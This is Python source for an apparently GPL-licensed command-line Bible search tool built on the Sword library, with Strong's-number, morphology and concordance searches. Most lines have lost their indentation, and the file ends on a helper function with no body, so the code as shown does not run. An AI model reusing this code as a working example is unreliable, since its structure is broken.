search_func = self.multiword_search
# Perform a strongs search.
strongs = bool(self._strongs_regx.match(term.upper()))
            # Perform a morphological search.
morph = bool(self._morph_regx.match(term.upper()))
# Search for words or phrases.
temp_set = search_func(term, strongs, morph, added, case_sensitive,
range_str)
# Add the results to the correct set.
combine_func(temp_set)
# Update the result set.
found_set.update(or_set)
found_set.update(xor_set)
if and_set and found_set:
# Make sure all the verses that are in the output have the words
            # or phrases that had a '+' in front of them.
found_set = and_set.union(found_set.intersection(and_set))
elif and_set:
# Found set must be empty to fill it with and_set's contents.
found_set.update(and_set)
# Finally remove all the verses that are in the not_set.
found_set.difference_update(not_set)
return found_set
def sword_search(self, search_terms, strongs=False, morph=False,
added=True, case_sensitive=False, range_str='',
search_type='lucene'):
""" sword_search(self, search_terms, strongs=False, morph=False,
case_sensitive=False, range_str='', search_type=-4) ->
Use the sword module to search for the terms.
search_terms - Terms to search for.
strongs - Search for Strong's Number phrases.
morph - Search for Morphological Tag phrases.
case_sensitive - Perform a case sensitive search.
range_str - A verse range to limit the search to.
search_type - What search type to use.
"""
search_terms = ' '.join(search_terms)
info_print("Searching using the Sword library for "
"'%s'..." % search_terms, tag=1)
found_set = set()
search_type_dict = {
'regex': 0,
'phrase': -1,
'multiword': -2,
'entryattrib': -3, # (e.g. Word//Lemma//G1234)
'lucene': -4
}
try:
# Render the text as plain.
markup = Sword.MarkupFilterMgr(Sword.FMT_PLAIN)
# Don't own this or it will crash.
markup.thisown = False
mgr = Sword.SWMgr(markup)
# Load the module.
module = mgr.getModule(self._module_name)
# Set the search type based on the search_type argument.
search_type = search_type_dict.get(search_type.lower(), -4)
# Make sure we can search like this.
if not module.isSearchSupported(search_terms, search_type):
print("Search not supported", file=sys.stderr)
                return found_set
# Get the range key.
if not range_str:
range_str = 'Genesis-Revelation'
range_k = Sword.VerseKey().parseVerseList(range_str, 'Genesis 1:1',
True)
flags = re.I if not case_sensitive else 0
if strongs:
# Search for strongs numbers.
# I don't know how to search for morphological tags using
                # Sword's search function.
prefix = 'lemma:'
for term in ','.join(search_terms.split()).split(','):
if not term.startswith('lemma:'):
# Make the term start with lemma: so sword will find
# it.
term = '%s%s' % (prefix, term)
# Perform the search.
resource = module.doSearch(term, search_type, flags,
range_k)
# Get the list of references from the range text.
found_set.update(resource.getRangeText().split('; '))
else:
# Perform the search.
resource = module.doSearch(search_terms, search_type, flags,
range_k)
# Get the list of references from the range text.
found_set.update(resource.getRangeText().strip().split('; '))
except Exception as err:
print("There was a problem while searching: %s" % err,
file=sys.stderr)
found_set.discard('')
return found_set
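    # Minimal usage sketch (an illustration; it assumes the Sword python
    # bindings and a 'KJV' module are installed, and that search_terms is
    # passed as a list as the ' '.join() above expects):
    #     refs = search.sword_search(['faith', 'love'], search_type='multiword')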
@_process_search
def test_search(self, search_terms, strongs=False, morph=False,
added=True, case_sensitive=False, range_str=''):
""" A Test.
"""
ref_set = self._index_dict.value_union(search_terms.split(),
case_sensitive)
if range_str:
# Only search through the supplied range.
ref_set.intersection_update(range_str)
ref_list = sorted(ref_set, key=sort_key)
term_dict = defaultdict(list)
raw_dict = RawDict(iter(ref_list), self._module_name)
words_len = 0
for verse_ref, (verse_text, verse_dict) in raw_dict:
for term in search_terms.split():
if self._strongs_regx.match(term):
num = self._strongs_regx.sub('\\1', term)
words = set(verse_dict[num.upper()])
if words:
term_dict[num.upper()].append({verse_ref: words})
elif self._morph_regx.match(term):
tag = self._morph_regx.sub('\\1', term)
words = set(verse_dict[tag.upper()])
if words:
term_dict[tag.upper()].append({verse_ref: words})
else:
for key, value in verse_dict['_words'][0].items():
if ' %s ' % term.lower() in ' %s ' % key.lower():
attr_dict = value[0]
if strongs and 'strongs' in attr_dict:
attr_list = attr_dict['strongs']
attr_list.append(key)
term_dict[term].append({verse_ref: attr_list})
if morph and 'morph' in attr_dict:
attr_list = attr_dict['morph']
attr_list.append(key)
words_len = max(len(attr_list), words_len)
term_dict[term].append({verse_ref: attr_list})
len_longest_ref = len(max(ref_set, key=len))
for key, value in term_dict.items():
words_len = max([len(i) for d in value for i, v in d.items()])
print('%s:' % key)
for dic in value:
ref, words = tuple(dic.items())[0]
if isinstance(words, list):
w_str = '"%s"' % '", "'.join(words[:-1])
l_str = '"%s"' % words[-1]
words_str = '{0:{2}}: {1}'.format(w_str, l_str, words_len)
else:
words_str = '"%s"' % '", "'.join(words)
print('\t{0:{1}}: {2}'.format(ref, len_longest_ref, words_str))
#print('\t{0:{1}}: "{2}"'.format(ref, len_longest_ref,
# '", "'.join(words)))
exit()
@_process_search
def test2_search(self, search_terms, strongs=False, morph=False,
added=True, case_sensitive=False, range_str=''):
""" A Test.
"""
ref_set = self._index_dict.value_union(search_terms.split(),
case_sensitive)
if range_str:
# Only search through the supplied range.
ref_set.intersection_update(range_str)
ref_iter = iter(sorted(ref_set, key=sort_key))
# Get an iterator that will return tuples
# (verse_reference, verse_text).
verse_iter = IndexedVerseTextIter(ref_iter, strongs=True,
morph=morph, added=added,
module=self._module_name)
# This will skip words.
not_words_str = r'\b\w+\b'
# This will skip Strong's Numbers.
not_strongs_str = r'<[^>]*>'
        # This will skip Morphological Tags.
not_morph_str = r'\{[^\}]*\}'
# This will skip all punctuation. Skipping ()'s is a problem for
# searching Morphological Tags, but it is necessary for the
# parenthesized words. May break highlighting.
not_punct_str = r'[\s,\?\!\.;:\\/_\(\)\[\]"\'-]'
max_ref_len = len(max(ref_set, key=len))
found_set = set()
term_dict = defaultdict(list)
for verse_ref, verse_text in verse_iter:
for term in search_terms.split():
if self._strongs_regx.match(term):
test_regx = re.compile(r'''
\s
((?:\b\w+\b|[\s,\?\!\.;:\\/_\(\)\[\]"\'-])+)
\s
((?:%s)+)
''' % term, re.I | re.X)
elif self._morph_regx.match(term):
test_regx = re.compile(r'''
\s((?:\b\w+\b|[\s,\?\!\.;:\\/_\(\)\[\]"\'-])+)
(?:<[^>]*>|\s)+
((?:%s)+)
''' % term, re.I | re.X)
else:
test_regx = re.compile(r'''
((?:\b\w+\b|[\s,\?\!\.;:\\/_\(\)\[\]"\'-])*?
%s
(?:\b\w+\b|[\s,\?\!\.;:\\/_\(\)\[\]"\'-])+)+
((?:<[^>]*>|\{[^\}]*\}|\s)+)
''' % term, re.I | re.X)
for match in test_regx.finditer(verse_text):
phrase, num = match.groups()
phrase = phrase.strip(',').strip('.').strip()
phrase = phrase.strip(';').strip('?').strip(':').strip()
num = num.replace('<', '').replace('>', '')
num = num.replace('{', '').replace('}', '')
if not phrase or not num.strip():
if not strongs:
break
print(verse_ref, verse_text)
print(match.group(), match.groups())
exit()
num = '"%s"' % '", "'.join(num.split())
term_dict[term].append(
'\t{0:{1}}: {2:{4}}: "{3}"'.format(verse_ref,
max_ref_len,
num, phrase,
18)
)
for term, lst in term_dict.items():
term = term.replace('<', '').replace('>', '')
term = term.replace('{', '').replace('}', '')
print('%s:\n%s' % (term, '\n'.join(lst)))
exit()
@_process_search
def test3_search(self, search_terms, strongs=False, morph=False,
added=True, case_sensitive=False, range_str=''):
""" A Test.
"""
ref_set = self._index_dict.value_union(search_terms.split(),
case_sensitive)
if range_str:
# Only search through the supplied range.
ref_set.intersection_update(range_str)
if not ref_set:
exit()
ref_iter = iter(sorted(ref_set, key=sort_key))
# Get an iterator that will return tuples
# (verse_reference, verse_text).
verse_iter = VerseTextIter(ref_iter, strongs=strongs,
morph=morph, render='raw',
module=self._module_name)
found_set = set()
strong_regx = re.compile(r'strong:([GH]\d+)', re.I)
morph_regx = re.compile(r'(?:Morph|robinson):([\w-]*)', re.I)
tag_regx = re.compile(r'''
([^<]*) # Before tag.
<(?P<tag>q|w|transChange|note) # Tag name.
([^>]*)> # Tag attributes.
([\w\W]*?)</(?P=tag)> # Tag text and end.
([^<]*) # Between tags.
''', re.I | re.X)
divname_regx = re.compile(r'''
(?:<seg>)?
<(?:divineName)>+
([^<]*?)
([\'s]*)
</(?:divineName)>
(?:</seg>)?
''', re.I | re.X)
xadded_regx = re.compile(r'<seg subType="x-added"[^>]*>([^<]*)</seg>',
re.I)
div_upper = lambda m: m.group(1).upper() + m.group(2)
marker_regx = re.compile(r'.*marker="(.)".*', re.I)
term_dict = defaultdict(list)
len_attrs = 0
for verse_ref, verse_text in verse_iter:
#print(render_raw(verse_text, strongs, morph))
#print(render_raw2(verse_text, strongs, morph))
#continue
for term in search_terms.split():
term = term.replace('<', '').replace('>', '')
term = term.replace('{', '').replace('}', '')
v_text = ''
info_print('%s\n' % verse_text, tag=4)
term_regx = re.compile('\\b%s\\b' % term, re.I)
for match in tag_regx.finditer(verse_text):
opt, tag_name, tag_attr, tag_text, punct = match.groups()
tag_text = xadded_regx.sub('\\1', tag_text)
if match.re.search(tag_text):
match_list = match.re.findall(tag_text + punct)
else:
match_list = [match.groups()]
for tag_tup in match_list:
opt, tag_name, tag_attr, tag_text, punct = tag_tup
info_print(tag_tup, tag=4)
value_list = []
attr_list = []
strongs_list = []
morph_list = []
tag_text = divname_regx.sub(div_upper, tag_text)
v_text += marker_regx.sub('\\1 ', opt) + tag_text + \
punct
if term.upper() in tag_attr:
attr_list = [term.upper()]
elif term_regx.search(tag_text):
if strongs or not morph:
strongs_list = strong_regx.findall(tag_attr)
if morph:
morph_list = morph_regx.findall(tag_attr)
for lst in (strongs_list, morph_list, attr_list):
if lst:
attr_str = '%s"' % '", "'.join(lst)
value_list = [attr_str, tag_text.strip()]
term_dict[term].append({verse_ref: value_list})
len_attrs = max(len(attr_str), len_attrs)
info_print(v_text, tag=4)
max_len_ref = len(max(ref_set, key=len))
for term, lst in term_dict.items():
print('%s:' % term)
for dic in lst:
ref, (attrs, s) = list(dic.items())[0]
s_l = '{1:{0}}: "{2}'.format(len_attrs, attrs, s)
print('\t{0:{1}}: "{2}"'.format(ref, max_len_ref, s_l))
exit()
@_process_search
def test4_search(self, search_terms, strongs=False, morph=False,
added=True, case_sensitive=False, range_str=''):
""" A Test.
"""
ref_set = self._index_dict.value_union(search_terms.split(),
case_sensitive)
if range_str:
# Only search through the supplied range.
ref_set.intersection_update(range_str)
if not ref_set:
exit()
ref_iter = iter(sorted(ref_set, key=sort_key))
# Get an iterator that will return tuples
# (verse_reference, verse_text).
verse_iter = VerseTextIter(ref_iter, strongs=strongs,
morph=morph, render='raw',
module=self._module_name)
found_set = set()
strong_regx = re.compile(r'strong:([GH]\d+)', re.I)
morph_regx = re.compile(r'(?:Morph|robinson):([\w-]*)', re.I)
tag_regx = re.compile(r'''
([^<>]*) # Before tag.
<(?P<tag>seg|q|w|transChange|note|title)# Tag name.
([^>]*)> # Tag attributes.
([\w\W]*?)</(?P=tag)> # Tag text and end.
([^<]*) # Between tags.
''', re.I | re.X)
divname_regx = re.compile(r'''
<(?:divineName)>
([^<]*?)
([\'s]*)
</(?:divineName)>
''', re.I | re.X)
div_upper = lambda m: m.group(1).upper() + m.group(2)
marker_regx = re.compile(r'.*marker="(.)".*', re.I)
term_dict = defaultdict(list)
len_attrs = 0
def recurse_tag(text, term, verse_ref, ctag_attr=''):
""" Recursively parses raw verse text using regular expressions,
and a list of dictionaries of the search term and any attributes
with its text.
"""
term_list = []
for match in tag_regx.finditer(text):
value_list = []
attr_list = []
strongs_list = []
morph_list = []
opt, tag_name, tag_attr, tag_text, punct = match.groups()
if match.re.search(tag_text):
term_list.extend(recurse_tag(tag_text, term, verse_ref,
tag_attr))
else:
info_print((opt, tag_name, tag_attr, tag_text, punct),
tag=4)
if marker_regx.match(opt):
opt = ''
tag_text = opt + divname_regx.sub(div_upper,
tag_text) + punct
if term.upper() in tag_attr or term.upper() in ctag_attr:
attr_list = [term.upper()]
elif term_regx.search(tag_text):
if strongs or not morph:
strongs_list.extend(strong_regx.findall(tag_attr))
strongs_list.extend(strong_regx.findall(ctag_attr))
if morph:
morph_list.extend(morph_regx.findall(tag_attr))
morph_list.extend(morph_regx.findall(ctag_attr))
for lst in (strongs_list, morph_list, attr_list):
if lst:
a_str = '%s"' % '", "'.join(lst)
value_list = [a_str, tag_text.strip()]
term_list.append({verse_ref: value_list})
return term_list
for verse_ref, verse_text in verse_iter:
#print(render_raw(verse_text, strongs, morph))
#print(render_raw2(verse_text, strongs, morph))
#continue
for term in search_terms.split():
term = term.replace('<', '').replace('>', '')
term = term.replace('{', '').replace('}', '')
v_text = ''
info_print('%s\n' % verse_text, tag=4)
term_regx = re.compile('\\b%s\\b' % term, re.I)
value_list = recurse_tag(verse_text, term, verse_ref)
if value_list:
for i in value_list:
len_attrs = max(len(i[verse_ref][0]), len_attrs)
term_dict[term].extend(value_list)
max_len_ref = len(max(ref_set, key=len))
for term, lst in term_dict.items():
print('%s:' % term)
for dic in lst:
ref, (attrs, s) = list(dic.items())[0]
s_l = '{1:{0}}: "{2}'.format(len_attrs, attrs, s)
print('\t{0:{1}}: "{2}"'.format(ref, max_len_ref, s_l))
return set()
concordance_search = test4_search
class SearchCmd(Cmd):
""" A Command line interface for searching the Bible.
"""
def __init__(self, module='KJV'):
""" Initialize the settings.
"""
        self.prompt = '\001\033[33m\002search\001\033[m\002> '
self.intro = '''
%s Copyright (C) 2011 Josiah Gordon <josiahg@gmail.com>
This program comes with ABSOLUTELY NO WARRANTY; for details type `show w'.
This is free software, and you are welcome to redistribute it
under certain conditions; type `show c' for details.
This is a Bible search program that searches the KJV
sword module. If you need help type 'help' to display a list of valid
commands. For help on a specific command type 'help <command>.'
Examples:
mixed 'jordan h03383' (Finds all verses with Strong's number 'H03383'
translated 'Jordan')
concordance live (Lists the references of all the verses with
the word 'live' in them, the Strong's number
that was used, and what the phrase is that
that Strong's number is translated as.)
concordance h02418 (Lists the references of all the verses with
the Strong's number 'H02418' and how it was
                        translated. It only occurs six times and all
of them are in Daniel.)
strongs h02418 (Looks up and gives the definition of the
Strong's number 'H02418.')
set range gen-mal (Sets the range to the Old Testament.)
Just about everything has tab-completion, so you can hit tab a couple
of times to see all the completions to what you are typing.
If you want to see this intro again type: 'intro'
To find out more type 'help'
(example: 'help search' will list the help for the search command.)
To exit type 'quit' or hit 'CTRL+D'
''' % os.path.basename(argv[0])
super(SearchCmd, self).__init__()
self._quoted_regex = re.compile('''
((?P<quote>'|")
.*?
(?P=quote)|[^'"]*)
''', re.X)
# Perform the specified search.
self._search = Search(module=module)
self._results = set()
self._search_list = []
self._highlight_list = []
self._words = self._search._index_dict['_words_']
self._strongs = self._search._index_dict['_strongs_']
self._morph = self._search._index_dict['_morph_']
self._book_list = list(book_gen())
self._setting_dict = {
'search_type': 'mixed',
'search_strongs': False,
'search_morph': False,
'case_sensitive': False,
'context': 0,
'one_line': False,
'show_notes': False,
'show_strongs': False,
'show_morph': False,
'added': True,
'range': '',
'extras': (),
'module': module,
}
self._search_types = ['mixed', 'mixed_phrase', 'multiword', 'anyword',
'combined', 'partial_word', 'ordered_multiword',
'regex', 'eitheror', 'sword_lucene',
'sword_phrase', 'sword_multiword',
'sword_entryattrib']
def _complete(self, text, line, begidx, endidx, complete_list):
""" Return a list of matching text.
"""
retlist = [i for i in complete_list if i.startswith(text)]
if not retlist:
# If nothing was found try words that contain the text.
retlist = [i for i in complete_list if text in i]
if not retlist:
# Finally try matching misspelled words.
retlist = get_close_matches(text, complete_list, cutoff=0.7)
return retlist
def _get_list(self, args):
""" Split the args into quoted strings and seperate words.
"""
arg_list = []
# Split the arg string into quoted phrases and single words.
for i, c in self._quoted_regex.findall(args):
if c in ['"', "'"]:
arg_list.append(i.strip(c))
else:
arg_list.extend(i.split())
return arg_list
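    # Illustrative example (not from the original source):
    #     self._get_list('"in the beginning" was')  ->  ['in the beginning', 'was']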
def do_test(self, args):
""" A Test.
"""
quoted_regex = re.compile('''((?P<quote>'|").*?(?P=quote)|[^'"]*)''')
print(quoted_regex.findall(args))
print(self._get_list(args))
def _print(self, text_iter):
""" Print all the text breaking it and screens so the user can read it
all.
"""
count = 0
for verse in text_iter:
count += len(verse.splitlines()) if '\n' in verse else 1
print(verse)
if count >= screen_size()[0] - 4:
count = 0
try:
input('[Press enter to see more, or CTRL+D to end.]')
                    print('\033[1A\033[K', end='')
except:
                    print('\033[G\033[K', end='')
break
def precmd(self, line):
""" Set the correct settings before running the line.
"""
if not line:
return line
cmd = line.split()[0]
if cmd in self._search_types:
search_type = cmd
if search_type.startswith('sword_'):
self._setting_dict['extras'] = (search_type[6:],)
search_type = search_type[:5]
else:
self._setting_dict['extras'] = ()
self._setting_dict['search_type'] = search_type
return line
def postcmd(self, stop, line):
""" If lookup was called then show the results.
"""
if not line:
return stop
cmd = line.split()[0]
if cmd == 'lookup':
self.onecmd('show_results')
return stop
def completedefault(self, text, line, begidx, endidx):
""" By default complete words in the Bible.
"""
words_list = self._words
return self._complete(text, line, begidx, endidx, words_list)
def do_shell(self, args):
""" Execute shell commands.
"""
os.system(args)
def do_concordance(self, args):
""" Perform a concordance like search.
"""
if not args:
return
arg_list = self._get_list(args)
# Search.
strongs_search = self._setting_dict['search_strongs']
morph_search = self._setting_dict['search_morph']
search_range = self._setting_dict['range']
case_sensitive = self._setting_dict['case_sensitive']
search_added = self._setting_dict['added']
self._search.test4_search(arg_list, strongs_search, morph_search,
search_added, case_sensitive, search_range)
def do_show(self, args):
""" Show relevent parts of the GPL.
"""
if args.lower() in ['c', 'copying']:
# Show the conditions.
print(copying_str)
elif args.lower() in ['w', 'warranty']:
# Show the warranty.
print(warranty_str)
else:
# Show the entire license.
print('%s%s' % (copying_str, warranty_str))
def do_EOF(self, args):
""" Exit when eof is recieved.
"""
return True
def do_quit(self, args):
""" Exit.
"""
return True
def do_help(self, args):
""" Print the help.
"""
if args:
try:
self._print(getattr(self, 'do_%s' % args).__doc__.splitlines())
return
except:
pass
super(SearchCmd, self).do_help(args)
def do_intro(self, args):
""" Re-print the intro screen.
"""
self._print(self.intro.splitlines())
def complete_show_results(self, text, line, begidx, endidx):
""" Tab completion for the show_results command.
"""
cmd_list = ['strongs', 'morph', 'notes', 'one_line']
return self._complete(text, line, begidx, endidx, cmd_list)
def do_show_results(self, args):
""" Output the results.
Print out all the verses that were either found by searching or by
lookup.
Extra arguments:
+/-strongs - Enable/disable strongs in the output.
+/-morph - Enable/disable morphology in the output
+/-notes - Enable/disable foot notes in the output.
+/-added - Enable/disable added text in the output.
+/-one_line - Enable/disable one line output.
anything else - If the output is from looking up verses with
the lookup command, then any other words or
quoted phrases given as arguments will be
highlighted in the output.
"""
search_type = self._setting_dict['search_type']
strongs_search = self._setting_dict['search_strongs']
morph_search = self._setting_dict['search_morph']
search_range = self._setting_dict['range']
case_sensitive = self._setting_dict['case_sensitive']
search_added = self._setting_dict['added']
module_name = self._setting_dict['module']
highlight_list = self._highlight_list
kwargs = self._setting_dict
results = self._results
# Get the output arguments.
show_strongs = self._setting_dict['show_strongs'] or strongs_search
show_morph = self._setting_dict['show_morph'] or morph_search
show_notes = self._setting_dict['show_notes']
one_line = self._setting_dict['one_line']
arg_list = self._get_list(args)
if '+strongs' in arg_list:
show_strongs = True
arg_list.remove('+strongs')
if '+morph' in args:
show_morph = True
arg_list.remove('+morph')
if '-strongs' in args:
show_strongs = False
arg_list.remove('-strongs')
if '-morph' in args:
            show_morph = False
arg_list.remove('-morph')
if '+notes' in args:
show_notes = True
arg_list.remove('+notes')
if '-notes' in args:
show_notes = False
arg_list.remove('-notes')
if '+one_line' in args:
one_line = True
arg_list.remove('+one_line')
if '-one_line' in args:
one_line = False
arg_list.remove('-one_line')
if '+added' in args:
search_added = True
arg_list.remove('+added')
if '-added' in args:
search_added = False
arg_list.remove('-added')
if search_range:
results.intersection_update(parse_verse_range(search_range))
if not highlight_list:
# Highlight anything else the user typed in.
highlight_list = arg_list
# Don't modify regular expression searches.
if search_type != 'regex':
regx_list = build_highlight_regx(highlight_list, case_sensitive,
(search_type == 'ordered_multiword'))
if kwargs['context']:
regx_list.extend(build_highlight_regx(results, case_sensitive))
else:
arg_str = ' '.join(arg_list)
            regx_list = [re.compile(arg_str, re.I if not case_sensitive else 0)]
# Flags for the highlight string.
flags = re.I if not case_sensitive else 0
# Add the specified number of verses before and after to provide
# context.
context_results = sorted(add_context(results, kwargs['context']),
key=sort_key)
# Get a formated verse string generator.
verse_gen = render_verses_with_italics(context_results,
not one_line,
show_strongs, show_morph,
search_added,
show_notes,
highlight_search_terms,
module_name, regx_list,
highlight_text, flags)
if one_line:
# Print it all on one line.
print(' '.join(verse_gen))
else:
            # Print the verses on separate lines.
self._print(verse_gen)
#print('\n'.join(verse_gen))
def complete_lookup(self, text, line, begidx, endidx):
""" Try to complete Verse references.
"""
name_list = self._book_list
text = text.capitalize()
return self._complete(text, line, begidx, endidx, name_list)
def do_lookup(self, args):
""" Lookup the verses by references.
Example: lookup gen1:3-5;mal3 (Look up Genesis chapter 1 verses
3-5 and Malachi chapter 3.)
"""
self._results = parse_verse_range(args)
self._highlight_list = []
def complete_strongs(self, text, line, begidx, endidx):
""" Tabe complete Strong's numbers.
"""
text = text.capitalize()
return self._complete(text, line, begidx, endidx, self._strongs)
def do_strongs(self, numbers):
""" Lookup one or more Strong's Numbers.
strongs number,number,number....
"""
# Lookup all the Strong's Numbers in the argument list.
        # Make all the numbers separated by a comma.
strongs_list = ','.join(numbers.upper().split()).split(',')
#TODO: Find what Strong's Modules are available and use the best,
# or let the user decide.
greek_strongs_lookup = Lookup('StrongsRealGreek')
hebrew_strongs_lookup = Lookup('StrongsRealHebrew')
for strongs_num in strongs_list:
# Greek Strong's Numbers start with a 'G' and Hebrew ones start
# with an 'H.'
if strongs_num.upper().startswith('G'):
mod_name = 'StrongsRealGreek'
else:
mod_name = 'StrongsRealHebrew'
print('%s\n' % mod_lookup(mod_name, strongs_num[1:]))
def complete_morph(self, text, line, begidx, endidx):
""" Tabe complete Morphological Tags.
"""
text = text.capitalize()
return self._complete(text, line, begidx, endidx, self._morph)
def do_morph(self, tags):
""" Lookup one or more Morphological Tags.
morph tag,tag,tag....
"""
# Lookup all the Morphological Tags in the argument list.
# I don't know how to lookup Hebrew morphological tags, so I
# only lookup Greek ones in 'Robinson.'
print('%s\n' % mod_lookup('Robinson', tags.upper()))
def do_websters(self, words):
""" Lookup one or more words in Websters Dictionary.
websters word,word,word...
"""
# Lookup words in the dictionary.
print('%s\n' % mod_lookup('WebstersDict', words))
def do_kjvd(self, words):
""" Lookup one or more words in the KJV Dictionary.
kjvd word,word,word...
"""
# Lookup words in the KJV dictionary.
print('%s\n' % mod_lookup('KJVD', words))
def do_daily(self, daily):
""" Display a daily devotional from 'Bagsters Daily light.'
daily date/today
Dates are given in the format Month.Day. The word 'today' is an alias
to today's date. The default is to lookup today's devotional.
"""
daily = 'today' if not daily else daily
# Lookup the specified daily devotional.
if daily.lower() == 'today':
# Today is an alias for today's date.
daily = strftime('%m.%d')
daily_lookup = Lookup('Daily')
# Try to make the output nicer.
print(daily_lookup.get_formatted_text(daily))
def complete_set(self, text, line, begidx, endidx):
""" Complete setting options.
"""
setting_list = self._setting_dict.keys()
return self._complete(text, line, begidx, endidx, setting_list)
def do_set(self, args):
""" Set settings.
Run without arguments to see the current settings.
set show_strongs = True/False - Enable strongs numbers in the
output.
set show_morph = True/False - Enable morphology in the output.
set context = <number> - Show <number> verses of context.
set case_sensitive = True/False - Set the search to case sensitive.
set range = <range> - Confine search/output to <range>.
set one_line = True/False - Don't break output at verses.
set added = True/False - Show/search added text.
set show_notes = True/False - Show foot-notes in output.
set search_type = <type> - Use <type> for searching.
set search_strongs = True/False - Search Strong's numbers
(deprecated).
set search_morph = True/False - Search Morphological Tags
(deprecated).
"""
if not args:
print("Current settings:\n")
max_len = len(max(self._setting_dict.keys(), key=len))
for setting, value in self._setting_dict.items():
if setting.lower() == 'range':
if not Sword:
value = VerseRange.parse_range(value)
value = '; '.join(str(i) for i in value)
else:
key = Sword.VerseKey()
range_list = key.parseVerseList(value, 'Genesis 1:1',
True, False)
value = range_list.getRangeText()
print('{1:{0}} = {2}'.format(max_len, setting, value))
print()
else:
for setting in args.split(';'):
if '=' in setting:
k, v = setting.split('=')
elif ' ' in setting:
k, v = setting.split()
else:
print(self._setting_dict.get(setting, ''))
continue
k = k.strip()
v = v.strip()
if isinstance(v, str):
if v.lower() == 'false':
v = False
elif v.lower() == 'true':
v = True
elif v.isdigit():
v = int(v)
self._setting_dict[k] = v
def complete_search(self, text, line, begidx, endidx):
""" Bible word completion to make searching easier.
"""
words_list = self._words
return self._complete(text, line, begidx, endidx, words_list)
complete_mixed = complete_search
complete_mixed_phrase = complete_search
complete_multiword = complete_search
complete_anyword = complete_search
complete_combined = complete_search
complete_partial_word = complete_search
complete_ordered_multiword = complete_search
complete_regex = complete_search
complete_eitheror = complete_search
complete_sword_lucene = complete_search
complete_sword_phrase = complete_search
complete_sword_multiword = complete_search
complete_sword_entryattrib = complete_search
def do_search(self, args):
""" Search the Bible.
Search types are:
mixed - A search made up of a mix of most of the
other search types. Put an '!' in front of
words/phrases that you don't want in any of
the results.
mixed_phrase - A phrase search that can include words,
Strong's, and Morphology. Can be used in
the mixed search by including words in
quotes.
multiword - Search for verses containing each word at
least once. Use in the mixed search by
putting a '+' in front of any word/phrase
you want to be in all the results.
anyword - Search for verses containing one or more of
any of the words. Use in the mixed search
by putting a '|' in front of any
word/phrase you want in any but not
necessarily all the results.
eitheror - Search for verses containing one and only
one of the words. In the mixed search put
a '^' in front of two or more words/phrases
to make the results contain one and only
one of the marked search terms.
combined - Search using a phrase like ('in' AND ('the'
OR 'it')) finding verses that have both
'in' and 'the' or both 'in' and 'it'.
To do the same thing with the mixed search
use a phrase like this:
(mixed '+in' '^the' '^it').
partial_word - Search for partial words (e.g. a search for
'begin*' would find all the words starting
with 'begin'.) Use in the mixed search to
make partial words in a phrase.
ordered_multiword - Search for words in order, but not
necessarily in a phrase. In the mixed
search put a '~' in front of any quoted
group of words you want to be in that
order, but you don't mind if they have
other words between them.
regex - A regular expression search (slow).
Examples:
mixed - (mixed '+~in the beg*' '!was') finds any
verse that has the words 'in', 'the', and
any word starting with 'beg', in order, but
not the word 'was.'
mixed_phrase - (mixed_phrase 'h011121 of gomer') finds any
verse with that phrase.
mixed search flags first column prefix (these should come first):
----------------------------------------------------------------
! = not (not in any of the results)
+ = all (in all the results)
| = or (in at least one result)
^ = exclusive or (only one in any of the results)
not example: (mixed 'in the beginning' !was) results will have the
phrase 'in the beginning' but will not have the word
'was.'
all example: (mixed 'in the beginning' +was) results may have the
phrase 'in the beginning' but all of them will have
                     the word 'was.' (note: this will find all verses with
                     the word 'was' in them; if you also want the results to
                     have the phrase 'in the beginning', you must prefix it
                     with a '+' as well.)
or example: (mixed 'in the beginning' |was) results will be all the
verses with the phrase 'in the beginning' and all the
verses with the word 'was.' This is the default way
the mixed search operates, so the '|' can be excluded
in this case.
exclusive or example: (mixed '^in the beginning' '^was') results
will either have the phrase 'in the
beginning' or the word 'was', but not both.
To be effective you must have at least two
search terms prefixed with '^.'
mixed search flags second column prefix (these come after the first
column flags):
-------------------------------------------------------------------
~ = sloppy phrase or ordered multiword
& = regular expression search.
sloppy phrase example: (mixed '~in the beginning') results will
have all the words 'in', 'the', and
'beginning,' but they may have other words
between them.
regular expression example:
            (mixed '&\\b[iI]n\\b\s+\\b[tT][hH][eE]\\b\s+\\b[bB]eginning\\b')
results will be all the verses with the phrase 'in the beginning.'
"""
if not args:
return
arg_list = self._get_list(args)
arg_str = ' '.join(arg_list)
self._search_list = arg_list
extras = self._setting_dict['extras']
search_type = self._setting_dict['search_type']
try:
# Get the search function asked for.
search_func = getattr(self._search, '%s_search' % search_type)
except AttributeError as err:
# An invalid search type was specified.
            print("Invalid search type: %s (%s)" % (search_type, err),
                  file=sys.stderr)
            sys.exit(1)
# Search.
strongs_search = self._setting_dict['search_strongs']
morph_search = self._setting_dict['search_morph']
search_range = self._setting_dict['range']
case_sensitive = self._setting_dict['case_sensitive']
search_added = self._setting_dict['added']
self._results = search_func(arg_list, strongs_search, morph_search,
search_added, case_sensitive, search_range,
*extras)
count = len(self._results)
        info_print("\nFound %s verse%s.\n" %
(count, 's' if count != 1 else ''),
tag=-10)
print("To view the verses type 'show_results.'")
if search_type in ['combined', 'combined_phrase']:
# Combined searches are complicated.
# Parse the search argument and build a highlight string from the
# result.
arg_parser = CombinedParse(arg_str)
parsed_args = arg_parser.word_list
not_l = arg_parser.not_list
# Remove any stray '+'s.
#highlight_str = highlight_str.replace('|+', ' ')
if search_type == 'combined_phrase':
# A phrase search needs to highlight phrases.
highlight_list = parsed_args
else:
highlight_list = ' '.join(parsed_args).split()
# Build the highlight string for the other searches.
elif search_type in ['anyword', 'multiword', 'eitheror',
'partial_word']:
# Highlight each word separately.
highlight_list = arg_str.split()
elif search_type == 'mixed':
# In mixed search phrases are in quotes so the arg_list should be
# what we want, but don't include any !'ed words.
highlight_list = [i for i in arg_list if not i.startswith('!')]
elif search_type in ['phrase', 'mixed_phrase', 'ordered_multiword']:
# Phrases should highlight phrases.
highlight_list = [arg_str]
elif search_type == 'sword':
highlight_list = arg_list
self._highlight_list = highlight_list
do_mixed = do_search
do_mixed_phrase = do_search
do_multiword = do_search
do_anyword = do_search
do_combined = do_search
do_partial_word = do_search
do_ordered_multiword = do_search
do_regex = do_search
do_eitheror = do_search
do_sword_lucene = do_search
do_sword_phrase = do_search
do_sword_multiword = do_search
do_sword_entryattrib = do_search
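# --- Illustrative sketch, not part of the original module -------------------
# The do_search docstring above documents the first-column prefix flags used
# by the mixed search ('!' not, '+' all, '|' any, '^' exclusive or).  The
# small helper below only demonstrates that flag convention by grouping raw
# terms; the real parsing and searching is done by the Search/CombinedParse
# machinery used in do_search, and the helper name is invented for this demo.
def _demo_group_mixed_terms(terms):
    """Group mixed-search terms by their first-column prefix flag."""
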